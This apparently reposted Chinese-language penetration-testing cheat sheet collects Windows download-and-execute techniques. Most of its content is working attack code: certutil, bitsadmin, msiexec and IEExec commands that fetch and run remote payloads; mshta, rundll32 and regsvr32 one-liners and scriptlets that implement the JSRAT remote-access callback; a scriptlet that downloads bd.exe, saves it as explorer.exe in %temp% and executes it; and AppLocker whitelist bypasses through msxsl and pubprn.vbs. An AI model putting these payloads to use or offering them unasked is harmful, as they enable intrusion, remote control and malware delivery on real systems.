在渗透或是病毒分析总是会遇到很多千奇百怪的下载文件和执行命令的方法。
win2003、winXP不支持
$client = new-object System.Net.WebClient
$client.DownloadFile(‘http://payloads.online/file.tar.gz’, ‘E:\file.tar.gz’)
ftp 192.168.3.2
输入用户名和密码后
cd E:\file # 进入E盘下的file目录
cd www # 进入服务器上的www目录
get access.log # 将服务器上的access.log下载到E:\file
可以参考:https://baike.baidu.com/item/ftp/13839
2.3、IPC$copy \\192.168.3.1\c$\test.exe E:\file
可以参考:https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx
应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2
certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt
可以参考:https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx
1、bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt
2、bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt
完整利用:
cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%d90f.exe&%APPDATA%d90f.exe&del %APPDATA%d90f.exe
msiexec /q /i http://192.168.3.1/test.txt
msiexec /q /i http://site.com/payloads/calc.png
calc.png
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
需要执行两条命令,一条关闭.net安全策略,一条下载
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
下载exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe
C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”
mshta http://192.168.3.1/run.hta
run.hta 内容如下:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
mshta是用来执行hta文件的,经过测试发现,其实没有hta文件,也可以通过mshta来执行命令的,经过几次测试发现mshta不仅可以使用vbscript,而且可以使用javascript来执行命令,整理payload如下:
VBSCRIPT EXEC
mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
JAVASCRIPT EXEC
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
JSRAT
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
其实还是依赖于WScript.shell这个组件
默认方式rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
calc.sct:
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
<!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
<!-- That should work over a proxy and SSL/TLS... -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
}
]]>
</script>
</scriptlet>
运行JSRAT:
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
JSRAT.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</registration>
</scriptlet>
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
js.png
<?XML version="1.0"?>
<let>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
< language="J">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("W.Shell").Run(ps,0,true);
]]>
</>
</registration>
</let>
运行计算器
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")
calc.wsc
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
运行JSRAT
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/JSRAT.wsc")
JSRAT.wsc:
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</component>
</package>
regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
test.data内容:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
还可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct(COM scriptlet - requires a webserver to stage the payload)
regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。
下载地址为:
Command Line Transformation Utility (msxsl.exe)
https://www.microsoft.com/en-us/download/details.aspx?id=21714
msxsl.exe 需要接受两个文件,XML及XSL文件,命令行 *** 作如下:
msxsl.exe demo.xml exec.xsl
demo.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
exec.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>
同样的,msxsl.exe可以远程加载,具体方式如下:
msxsl https://website.com/scripts/demo.xml https://website.com/scripts/exec.xsl
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi
命令行运行:
msiexec /quiet /i cacl.msi
将payload放在远程服务器上运行:
https://website.com/payloads/calc.png
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/explorer.exe";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://x.x.x.x/bd.exe", false);
xhr.send();
if (xhr.Status == 200) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var stream = new ActiveXObject("ADODB.Stream");
stream.Open();
stream.Type = 1;
stream.Write(xhr.ResponseBody);
stream.Position = 0;
if (fso.FileExists(filepath)){
fso.DeleteFile(filepath);
}
stream.SaveToFile(filepath);
stream.Close();
new ActiveXObject("WScript.Shell").Exec(filepath);
}
]]>
</script>
</registration>
</scriptlet>
在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本,其位于C:\Windows\System32\Printing_Admin_Scripts\en-US,仔细观察该脚本可以发现其显然是由用户提供输入(通过命令行参数),之后再将参数传递给GetObject()
"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Bypass AppLocker With MSXSL.EXE
https://evi1cg.me/archives/AppLocker_Bypass_MSXSL.html
Windows下命令行下载文件总结
http://payloads.online/archivers/2017-11-08/1
Bypassing Applocker with msiexec
https://evi1cg.me/archives/Bypassing_Applocker_with_msiexec.html
Exec Commands Via Mshta.exe
https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html
Exec Commands Via Mshta.exe
https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html
JSRAT几种启动方式
https://evi1cg.me/archives/Run_JSRAT.html
windows命令执行漏洞不会玩? 看我!
http://www.sohu.com/a/199732200_99907709
WSH注入技巧分享
http://www.freebuf.com/articles/system/143957.html
Application Whitelist Bypass using IEexec.exe
https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)